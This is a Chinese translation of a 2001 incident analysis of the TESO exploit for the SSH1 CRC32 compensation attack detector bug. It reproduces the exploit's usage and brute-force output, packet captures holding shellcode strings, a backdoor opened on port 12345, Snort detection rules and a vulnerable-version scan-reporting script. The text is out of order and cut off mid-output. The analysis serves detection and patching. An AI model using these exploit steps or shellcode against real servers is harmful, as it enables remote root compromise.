Nov 1 18:58:18 victim sshd[9614]: fatal: Timeout before authentication.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

注重日志條目的最後一條,假如成功利用此漏洞被入侵,認證過程就會停止,因爲

此時SHELLCODE的後門程序已經執行,這樣你可以連接端口進行任何操作。唯一的

問題是,SSH守護程序(至少SSH.com 1.2.31)會由于認證過程不完整而超時,導致

關閉開啓的SHELL。一般在監聽shell的父進程關閉只前會有10分鍾時間空域。

網絡通信信息分析

=====================

在這裏使用了Tcpdump來截獲上面的攻擊行爲,記錄信息在sshdx.dump,可以被用

來IDS入侵檢測系統獲得攻擊標志信息。假如你的IDS系統不支持tcpdump文件,你

可以使用"tcpreplay"[12]來轉換tcpdump信息。

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# tcpdump -s1500 -w sshdx.dump ip host 10.10.10.3 &

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

這樣可以很輕易的查看SSH守護程序産生的多個連接信息,使用"ngrep"[5]工具可以

辨認出最後連接和插入SHELLCODE的暴力破解攻擊信息:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

. . .

T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]

SSH-1.5-1.2.31.

T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]

SSH-1.5-OpenSSH_2.2.0p1.

T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]

............GA..@.......%....`..P.....D&..2.+7#...1!?..c.r).8.^.h.....

..I..b6..9.f........N..0....:BAh@s.e...H......(.D2.Zg......#.......\.j

W...O$....6.......$...V..;...U.@Y.K2.p<\..o..?..l.........*.p.K<s..,..

.@7.wBBy......1.i..%".....G*g.G.t(......M........[.......J......<.

T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]

............GA..@.....`G.Fg.g.!.i.}..........._.e....=../..6....;....)

T.....|c...#W.\wve.cy .n.....q.Sc....}..".N.G.w"....n.../#.....8x..&.Z

....Q/.......8..

T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]

.........4..

T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]

..W...2.......2.......2.......2.......2.......2.......2.......2.......

2.......2.......2.......2.......2.......2.......2.......2.......2 ....

..2!......2$......2%......2(......2)......2,......2-......20......21..

....24......25......28......29......2<......2=......2@......2A......2D

......2E......2H......2I......2L......2M......2P......2Q......2T......

2U......2X......2Y......2\......2]......2`......2a......2d......2e....

..2h......2i......2l......2m......2p......2q......2t......2u......2x..

....2y......2|......2}......2.......2.......2.......2.......2.......2.

......2.......2.......2.......2.......2.......2.......2.......2.......

2.......2.......2.......2.......2.......2.......2.......2.......2.....

..2.......2.......2.......2.......2.......2.......2.......2.......2...

....2.......2.......2.......2.......2.......2.......2.......2.......2.

......2.......2.......2.......2.......2.......2.......2.......2.......

2.......2.......2.......2.......2.......2.......2.......2.......2.....

..2.......2.......2.......2.......2.......2.......3.......3.......3...

....3.......3.......3.......3.......3.......3.......3.......3.......3.

......3.......3.......3.......3.......3 ......3!......3$......3%......

3(......3)......3,......3-......30......31......34......35......38....

..39......3<......3=......3@......3A......3D......3E......3H......3I..

....3L......3M......3P......3Q......3T......3U......3X......3Y......3\

......3]......3`......3a......3d........1...p}.@

T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]

......3i......3l......3m......3p......3q......3t......3u......3x......

3y......3|......3}......3.......3.......3.......3.......3.......3.....

..3.......3.......3.......3.......3.......3.......3.......3.......3...

....3.......3.......3.......3.......3.......3.......3.......3.......3.

......3.......3.......3.......3.......3.......3.......3.......3.......

3.......3.......3.......3.......3.......3.......3.......3.......3.....

..3.......3.......3.......3.......3.......3.......3.......3.......3...

....3.......3.......3.......3.......3.......3.......3.......3.......3.

......3.......3.......3.......3.......3.......4.......4.......4.......

4.......4.......4.......4.......4.......4.......4.......4.......4.....

..4.......4.......4.......4.......4 ......4!......4$......4%......4(..

....4)......4,......4-......40......41......44......45......48......49

......4<......4=......4@......4A......4D......4E......4H......4I......

4L......4M......4P......4Q......4T......4U......4X......4Y......4\....

..4]......4`......4a......4d......4e......4h......4i......4l......4m..

....4p......4q......4t......4u......4x......4y......4|......4}......4.

......4.......4.......4.......4.......4.......4.......4.......4.......

4.......4.......4.......4.......4.......4.......4.......4.......4.....

..4.......4.......4.......4.......4.......4.......4.......4.......4...

....4.......4.......4.......4.......4.......4.......4.......4.......4.

......4.......4.......4.......4.........1...p}.@

. . .

T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]

......................................................................

......................................................................

......................................................................

......................................................................

......................................................................

......................................................................

......................................................................

......................................................................

.....................1..f..1...C.].C.].K.M..M...1..E.Cf.].f.E.09.M..E.

.E..E.....M.....CC....C....1..?......A....^.u.1..F..E......M..U.......

./bin/sh.h0h0h0, 7350, zip/TESO!......................................

......................................................................

......................................................................

......................................................................

......................................................................

......................................................................

......................................................................

......................................................................

......................................................................

......................................................................

........................................1...p}.@

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

這樣針對這個攻擊程序你可以匹配如下字符串"h0h0h0, 7350, zip/TESO!" [7] 和NOP等。

下面的特征字符串由Marty Roesch 和 Brian Caswell開發並可使用在Snort v1.8 或者

更高的版本[6]:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \

 (msg:"EXPLOIT ssh CRC32 overflow /bin/sh"; \

 flags:A+; content:"/bin/sh"; \

 reference:bugtraq,2347; reference:cve,CVE-2001-0144; \

 classtype:shellcode-detect;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \

 (msg:"EXPLOIT ssh CRC32 overflow filler"; \

 flags:A+; content:"|00 00 00 00 00 00 00 00 00 00 00 00 00|"; \

 reference:bugtraq,2347; reference:cve,CVE-2001-0144; \

 classtype:shellcode-detect;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \

 (msg:"EXPLOIT ssh CRC32 overflow NOOP"; \

 flags:A+; content:"|90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90|"; \

 reference:bugtraq,2347; reference:cve,CVE-2001-0144; \

 classtype:shellcode-detect;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \

 (msg:"EXPLOIT ssh CRC32 overflow"; \

 flags:A+; content:"|00 01 57 00 00 00 18|"; offset:0; depth:7; \

 content:"|FF FF FF FF 00 00|"; offset:8; depth:14; \

 reference:bugtraq,2347; reference:cve,CVE-2001-0144; \

 classtype:shellcode-detect;)

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

鑒別你的主機是否存在此漏洞

===========================

你可以使用Jeremy Mates' scan_ssh.pl[8] 和 Niels Provos' ScanSSH scanner[9]

寫的腳本來鑒別SSH服務和它們的版本。

Russell Fulton 也公布了一個腳本程序Argus[10]用來處理日志,包含在下面的附錄中。

----------------------------------------------------------------------------

參考

========

[1] Portable Linux Amazing CD (PLAC) v2.9.1pre2, by Fred Cohen

 http://www.all.net/ForensiX/plac.html

[2] Netcat, by der Hobbit

 http://www.l0pht.com/~weld/netcat/

[3] Reverse Engineer's Query Tool

 http://packetstormsecurity.org/linux/reverse-engineering/reqt-0.7f.tar.gz

[4] LiSt Open Files (lsof)

 http://sunsite.securitycentralhq.com/mirrors/security/lsof/lsof.tar.gz

[5] ngrep, by Jordan Ritter

 http://www.packetfactory.net/projects/ngrep/

[6] Snort

 http://www.snort.org/

[7] 7350.org / 7350

 http://www.7350.org/

 http://www.team-teso.org/about.php (see the bottom)

[8] Jeremy Mates 提供的ssh_scan.pl

 http://sial.org/code/perl/scripts/ssh_scan.pl.html

[9] Niels Provos提供的ScanSSH 掃描程序

 http://www.monkey.org/~provos/scanssh/

[10] Argus - 網絡傳輸審核工具

 http://www.pl.freebsd.org/es/ports/net.html#argus-1.8.1

[11] tcpdump

 http://staff.washington.edu/dittrich/misc/sshdx.dump

[12] tcpreplay

 http://packages.debian.org/testing/net/tcpreplay.html

Appendix A

==========

兩個掃描腳本如下

=-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

#!/usr/bin/perl

#

# ssh-report

#

# Dave Dittrich <dittrich@cac.washington.edu>

# Thu Nov 8 21:39:20 PST 2001

#

# Process output of scans for SSH servers, with version identifying

# information, into two level break report format by SSH version.

#

# This script operates on a list of scan results that look

# like this:

#

# % cat scanresults

# 10.0.0.1 beavertail.dept.foo.edu SSH-1.5-1.2.31

# 10.0.0.2 lumpysoup.dept.foo.edu SSH-1.5-1.2.31

# 10.0.0.3 marktwain.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2

# 10.0.0.4 junebug.dept.foo.edu SSH-1.5-1.2.31

# 10.0.0.10 calvin.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2

# 10.0.0.11 hobbes.dept.foo.edu SSH-1.99-OpenSSH_2.1.1

# 10.0.0.20 willow.dept.foo.edu SSH-1.99-OpenSSH_2.9p2

# 10.0.0.21 berry.dept.foo.edu SSH-1.99-OpenSSH_2.9p2

# 10.0.0.23 whimpy.dept.foo.edu SSH-1.99-OpenSSH_2.9p2

#

# The resulting report (without the "-a" flag) will look like this:

#

# % ssh-report < scanresults

#

# SSH-1.5-1.2.31 (affected)

# beavertail.dept.foo.edu(10.0.0.1)

# lumpysoup.dept.foo.edu(10.0.0.2)

# junebug.dept.foo.edu(10.0.0.4)

#

#

# SSH-1.99-OpenSSH_2.1.1 (affected)

# hobbes.dept.foo.edu(10.0.0.11)

#

# By default, this script will only report on those systems that

# are running potentially vulnerable SSH servers. Use the "-a"

# option to report on all servers. Use "grep -v" to filter out

# hosts *before* you run them through this reporting script.

#

# SSH servers are considered "affected" if they are known, by being

# listed in one or more of the following references, to have the crc32

# compensation attack detector vulnerability:

#

# http://www.kb.cert.org/vuls/id/945216

# http://www.securityfocus.com/bid/2347/

# http://xforce.iss.net/alerts/advise100.php

# http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm

#

# You also may need to adjust the logic below to lump systems

# into the "Unknown" category correctly (e.g., if your server

# has a custom version string, Access control, etc.)

#

# The list below of servers and potential vulnerability was derived by

# summarizing existing versions on a set of production networks and

# using the advisories and reference material listed above. You

# should update this list as new information is oBTained, or if new

# versions of the SSH server are found on your network.

%affected = (

'Unknown', 'unknown',

'SSH-1.4-1.2.14', 'not affected',

'SSH-1.4-1.2.15', 'not affected',

'SSH-1.4-1.2.16', 'not affected',

'SSH-1.5-1.2.17', 'not affected',

'SSH-1.5-1.2.18', 'not affected',

'SSH-1.5-1.2.19', 'not affected',

'SSH-1.5-1.2.20', 'not affected',

'SSH-1.5-1.2.21', 'not affected',

'SSH-1.5-1.2.22', 'not affected',

'SSH-1.5-1.2.23', 'not affected',

'SSH-1.5-1.2.24', 'affected',

'SSH-1.5-1.2.25', 'affected',

'SSH-1.5-1.2.26', 'affected',

'SSH-1.5-1.2.27', 'affected',

'SSH-1.5-1.2.28', 'affected',

'SSH-1.5-1.2.29', 'affected',

'SSH-1.5-1.2.30', 'affected',

'SSH-1.5-1.2.31', 'affected',

'SSH-1.5-1.2.31a', 'not affected',

'SSH-1.5-1.2.32', 'not affected',

'SSH-1.5-1.3.7', 'not affected',

'SSH-1.5-Cisco-1.25', 'unknown',

'SSH-1.5-OSU_1.5alpha1', 'unknown',

'SSH-1.5-OpenSSH-1.2', 'affected',

'SSH-1.5-OpenSSH-1.2.1', 'affected',

'SSH-1.5-OpenSSH-1.2.2', 'affected',

'SSH-1.5-OpenSSH-1.2.3', 'affected',

'SSH-1.5-OpenSSH_2.5.1', 'not affected',

'SSH-1.5-OpenSSH_2.5.1p1', 'not affected',

'SSH-1.5-OpenSSH_2.9p1', 'not affected',

'SSH-1.5-OpenSSH_2.9p2', 'not affected',

'SSH-1.5-RemotelyAnywhere', 'not affected',

'SSH-1.99-2.0.11', 'affected w/Version 1 fallback',

'SSH-1.99-2.0.12', 'affected w/Version 1 fallback',

'SSH-1.99-2.0.13', 'affected w/Version 1 fallback',

'SSH-1.99-2.1.0.pl2', 'affected w/Version 1 fallback',

'SSH-1.99-2.1.0', 'affected w/Version 1 fallback',

'SSH-1.99-2.2.0', 'affected w/Version 1 fallback',

'SSH-1.99-2.3.0', 'affected w/Version 1 fallback',

'SSH-1.99-2.4.0', 'affected w/Version 1 fallback',

'SSH-1.99-3.0.0', 'affected w/Version 1 fallback',

'SSH-1.99-3.0.1', 'affected w/Version 1 fallback',

'SSH-1.99-OpenSSH-2.1', 'affected',

'SSH-1.99-OpenSSH_2.1.1', 'affected',

'SSH-1.99-OpenSSH_2.2.0', 'affected',

'SSH-1.99-OpenSSH_2.2.0p1', 'affected',

'SSH-1.99-OpenSSH_2.3.0', 'not affected',

'SSH-1.99-OpenSSH_2.3.0p1', 'not affected',

'SSH-1.99-OpenSSH_2.5.1', 'not affected',

'SSH-1.99-OpenSSH_2.5.1p1', 'not affected',

'SSH-1.99-OpenSSH_2.5.1p2', 'not affected',

'SSH-1.99-OpenSSH_2.5.2p2', 'not affected',

'SSH-1.99-OpenSSH_2.9.9p2', 'not affected',

'SSH-1.99-OpenSSH_2.9', 'not affected',

'SSH-1.99-OpenSSH_2.9p1', 'not affected',

'SSH-1.99-OpenSSH_2.9p2', 'not affected',

'SSH-1.99-OpenSSH_3.0p1', 'not affected',

'SSH-2.0-1.1.1', 'unknown',

'SSH-2.0-2.3.0', 'affected w/Version 1 fallback',

'SSH-2.0-2.4.0', 'affected w/Version 1 fallback',

'SSH-2.0-3.0.0', 'affected w/Version 1 fallback',

'SSH-2.0-3.0.1', 'affected w/Version 1 fallback',

'SSH-2.0-OpenSSH_2.5.1p1', 'not affected',

'SSH-2.0-OpenSSH_2.5.2p2', 'not affected',

'SSH-2.0-OpenSSH_2.9.9p2', 'not affected',

'SSH-2.0-OpenSSH_2.9p2', 'not affected',

);

# Make SURE you read the code first.

&IKnowWhatImDoing();

$all++, shift(@ARGV) if $ARGV[0] eq "-a";

while (<>) {

 chop;

 s/\s+/ /g;

 ($ip, $host, $version) = split(' ', $_);

 # Adjust this to identify other strings reported

 # by servers that have access restrictions, etc.

 # in place and do not show a specific version number.

 # They all fall under the category "Unknown" in this case.

 $version = "Unknown"

 if ($version eq "Couldn't" ||

 $version eq "Unknown" ||

 $version eq "You" ||

 $version eq "timeout");

 $server = $host;

}

foreach $i (sort keys %server) {

 ($version,$ip) = split(":", $i);

 next if ($affected eq "not affected" && ! $all);

 printf("\n\n%s (%s)\n", $version, $affected)

 if ($curver ne $version);

 $curver = $version;

 print " " . $server . "($ip)\n";

}

exit(0);

sub IKnowWhatImDoing {

 local $IKnowWhatImDoing = 0;

 # Uncomment the following line to make this script work.

 # $IKnowWhatImDoing++;

 die "I told you to read the code first, didn't I?\n"

 unless $IKnowWhatImDoing;

 return;

}

=-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

由于SSH crc32 compensation attack detector eXPloit代碼的流傳開來,對于 SSH的掃描也越來越多,這是一份統計報表: +------------+------------+----------+----------+-----------+ | date | #Probes| #Sources | #Targets | #Scanners | +------------+------------+----------+----------+-----------+ | 2001-10-03 | 1466 |45|987 | | | 2001-10-04 |319 |25|212 | | | 2001-10-05 |825 |22|783 | | | 2001-10-06 |86552 |27|86305 | | | 2001-10-07 | 7564 |29| 7429 | | | 2001-10-08 | 2506 |29| 2449 | | | 2001-10-09 | 1010 |18|263 | | | 2001-10-10 |480 |39|307 | | | 2001-10-11 |978 |31|504 | | | 2001-10-12 |436 |21|311 | | | 2001-10-13 | 6731 |27| 6353 | | | 2001-10-14 | 1411 |29| 1084 | | | 2001-10-15 |936 |34|723 | | | 2001-10-16 | 1358 |40| 1256 | | | 2001-10-17 | 1098 |36|899 | | | 2001-10-18 | 1779 |31| 1438 | | | 2001-10-19 |19722 |28|19573 | 7 | | 2001-10-20 |25539 |21|25419 | 3 | | 2001-10-21 | 6796 |26| 6750 | 9 | | 2001-10-22 |807 |30|482 | 5 | | 2001-10-23 |578 |49|327 | 6 | | 2001-10-24 | 2198 |39| 2025 | 9 | | 2001-10-25 | 2368 |31| 1759 | 6 | | 2001-10-26 |712 |37|591 | 7 | | 2001-10-27 |463 |30|297 | 8 | | 2001-10-28 |495 |30|263 | 5 | | 2001-10-29 |478 |37|399 | 5 | | 2001-10-30 | 1154 |48| 1051 | 5 | | 2001-10-31 | 1998 |46| 1047 | 5 | | 2001-11-01 |66660 |46|66386 | 5 | | 2001-11-02 | 1514 |40|926 | 5 | | 2001-11-03 | 2142 |36| 2047 | 8 | | 2001-11-04 | 1233 |26|781 | 9 | +------------+------------+----------+----------+-----------+ 鑒于此情況,編譯整理David A. Dittrich <dittrich@cac.washington.edu> 文章(http://staff.washington.edu/dittrich/misc/ssh-analysis.txt)供大家參考和修補。 ------------------------------------------------------------------------------- 概述 ================== 此漏洞最開始由CORE-SDI組織在securityfocus.com上的BUGTRAQ上發布了他們安全 公告CORE-20010207,日期爲2001,2月8號: http://www.securityfocus.com/advisories/3088 漏洞的簡單描述就是:ssh1守護程序中所帶的一段代碼中存在一個整數溢出問題。問題出在 deattack.c,此程序由CORE SDI開發,用來防止SSH1協議受到CRC32補償攻擊。 由于在detect_attack()函數中錯誤的將一個16位的無符號變量當成了32位變量來使用,導致表索引溢出問題。 這將答應一個攻擊者覆蓋內存中的任意位置的內容,攻擊者可能遠程獲取root權限。 其他組織也陸續公布了一些對這個SSH 漏洞的分析和建議如:  http://xforce.iss.net/alerts/advise100.PHP  http://razor.bindview.com/publish/advisories/adv_ssh1crc.Html  http://www.securityfocus.com/bugid=2347 而在2001年10月21號Jay Dyson在incidents@securityfocus.com郵件列表上聲明 有不少信息顯示有人在掃描RIPE 網絡段的SSH服務器:  http://www.securityfocus.com/cgi-bin/archive.pl?id=75&start=2001-10-27&end=2001-11-02&mid=221998&threads=1 然後更甚的是在vuln-dev@securityfocus.com郵件列表中提示Newsbytes.com中 有新聞描述有人願付$1000美金的人提供此攻擊工具。還有沒有確認的傳聞針對 Solaris 8/SPARC SSH.com 1.2.26-31 系統的攻擊代碼也存在。聞名的安全站點 securitynewsportal.com就被這個漏洞攻擊,下面地址是被黑截圖:  http://defaced.alldas.de/mirror/2001/10/24/www.securitynewsportal.com/ 最近TESO發布了關于這些攻擊代碼的信息,你可以在下面的地址查看:  http://www.team-teso.org/sshd_statement.php 下面是受影響的SSH版本: SSH Communications Security SSH 2.x and 3.x (if SSH Version 1 fallback is enabled) SSH Communications Security SSH 1.2.23-1.2.31 F-Secure SSH versions prior to 1.3.11-2 OpenSSH versions prior to 2.3.0 (if SSH Version 1 fallback is enabled) OSSH 1.5.7 不過供給商已經爲系統提供補丁信息,大家可以參考如下地址:  http://www.ssh.com/prodUCts/ssh/advisories/ssh1_crc-32.cfm  http://openssh.org/security.html  http://www.cisco.com/warp/public/707/SSH-multiple-pub.html --------------------------------------------------------------------------- 攻擊行爲的分析 ===================== 2001年10月6日,攻擊者從Netherlands網絡段使用crc32 compensation attack detector漏洞攻擊程序入侵了一台UW網絡中使用了OpenSSH 2.1.1的Redhat Linux 系統,漏洞描述如CERT VU#945216所述:  http://www.kb.cert.org/vuls/id/945216 系統中一系列操作系統命令被替換成木馬程序以提供以後再次進入並清除了所有 日志系統。第二台SSH服務器運行在39999/tcp高端口,系統入侵後被用來掃描其他 UW以外的網絡以獲得更多的運行OpenSSH 2.1.1的系統。 通過一些恢複操作對這個漏洞程序進行了分析: 這個攻擊代碼基于OpenSSH 2.2.0版本(這個是2.1.1之後的版本,對crc32 compensation attack detection function進行了修補),不過針對OpenSSH 2.1.1進行攻擊,其攻擊代碼也可以使用在ssh.com 1.2.31版本(針對其他SSH 協議1 和版本的測試尚無完成)。 攻擊代碼對針對如下系統:  linux/x86 ssh.com 1.2.26-1.2.31 rhl  linux/x86 openssh 1.2.3 (maybe others)  linux/x86 openssh 2.2.0p1 (maybe others)  freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl 雖然這個攻擊代碼可以對多個平台系統進行攻擊,這裏攻擊者只掃描22/tcp端口, 然後連接這些系統獲得響應的版本程序並只對"OpenSSH_2.1.1"繼續進一步操作。 這些掃描使用快速SYN掃描,使用來自t0rn root kit中的工具。 對破壞的系統進行分析發現已經有47067個地址被掃描,而在這些地址中,有1244 個主機被鑒別存在此漏洞,攻擊者成功的在8月8日系統離線之前利用此漏洞進入 4個主機。 這個攻擊者代碼對使用訪問控制限制(如, SSH.com的"AllowHosts" 或者 "DenyHosts" 設置) 或者包過濾(如, ipchains, iptables, ipf) 的系統不能正常工作,因爲這些 會要求交換Public keys。 ------------------------------------------------------------------------- 對攻擊者代碼實時的分析 ============================ 此攻擊代碼在隔離的網絡段進行測試,使用了網絡地址爲10.10.10.0/24,攻擊 主機使用了10.10.10.10 而有漏洞的服務主機爲 10.10.10.3。 有漏洞的服務主機系統運行了在Red Hat Linux6.0(Kernel 2.2.16-3 on an i586) 的SSH.com的 1.2.31 版本。 而攻擊主機運行了Fred Cohen's PLAC[1] (從CD-ROM引導的Linux 2.4.5 系統), 文件使用"nc"(Netcat)[2]拷貝到系統中. 攻擊一方再現 ========================= 當以沒有任何參數運行攻擊代碼的時候會顯示使用信息: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= root@plac /bin >> ./ssh linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from openssh 2.2.0 src greets: mray, random, big t, sh1fty, scut, dvorak ps. this sploit already owned cia.gov :/ **please pick a type** Usage: ./ssh host [options] Options: -p port -b base Base address to start bruteforcing distance, by default 0x1800, goes as high as 0x10000 -t type -d debug mode -o Add this to delta_min types: 0: linux/x86 ssh.com 1.2.26-1.2.31 rhl 1: linux/x86 openssh 1.2.3 (maybe others) 2: linux/x86 openssh 2.2.0p1 (maybe others) 3: freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 被測試系統在系統端口2222上運行著SSH.com version 1.2.31 (未修補)程序,並 把syslog日志重定向獨立的文件sshdx.log. 這裏選擇了類型type 0和2222 攻擊端口: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= root@plac /bin >> ./ssh 10.10.10.3 -p 2222 -t 0 linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from openssh 2.2.0 src greets: mray, random, big t, sh1fty, scut, dvorak ps. this sploit already owned cia.gov :/ ........................... bruteforced distance: 0x3200 bruteforcing distance from h->partial packet buffer on stack ..............^[[A................|////////\\\\! bruteforced h->ident buff distance: 5bfbed88 trying retloc_delta: 35 ....! found high Words of possible return address: 808 trying to exploit .... trying retloc_delta: 37 .! found high words of possible return address: 805 trying to exploit .... trying retloc_delta: 39 ...... trying retloc_delta: 3b ...... trying retloc_delta: 3d ! found high words of possible return address: 804 trying to exploit .... trying retloc_delta: 3f ...... =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 這裏看來,攻擊攻擊相似被"停止"了,返回被攻擊系統查看卻發現被開了後門。 被測試系統一方再現 ======================= 在利用漏洞之前,被測試系統顯示標准SSH守護程序運行在22/tcp端口,要被 測試的應用程序運行在2222/tcp端口,兩個都在監聽狀態,而且標准SSH守護 程序有一個外部連接(10.10.10.2:33354),通過netstat查看如下: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [root@victim /root]# netstat -an --inet Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN raw 0 0 0.0.0.0:1 0.0.0.0:* 7 raw 0 0 0.0.0.0:6 0.0.0.0:* 7 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 而在攻擊程序"停止"以後,再用netstat查看網絡監聽狀態如下: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [root@victim /root]# netstat -an --inet Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN tcp 0 0 10.10.10.3:2222 10.10.10.10:32965 ESTABLISHED tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN raw 0 0 0.0.0.0:1 0.0.0.0:* 7 raw 0 0 0.0.0.0:6 0.0.0.0:* 7 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 發現有新的服務在12345/tcp端口監聽。 返回攻擊者主機,使用netstat查看網絡狀態,發現程序使用了暴力猜測地址 方式攻擊: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [root@victim /root]# netstat -an --inet Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN tcp 1252 0 10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED tcp 0 0 10.10.10.3:2222 10.10.10.10:33075 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33074 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33072 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33071 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33069 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33067 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33066 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33064 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33063 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33062 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33061 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33060 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33059 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33058 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33056 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33055 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33053 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33051 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33050 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33048 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33047 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33046 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33042 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33041 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33040 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33039 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33038 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33036 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33035 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33034 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33033 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33032 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33030 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33029 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33028 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33027 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33024 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33023 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33022 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33021 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33020 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33016 TIME_WAIT tcp 0 0 10.10.10.3:2222 10.10.10.10:33014 TIME_WAIT tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED tcp 0 0 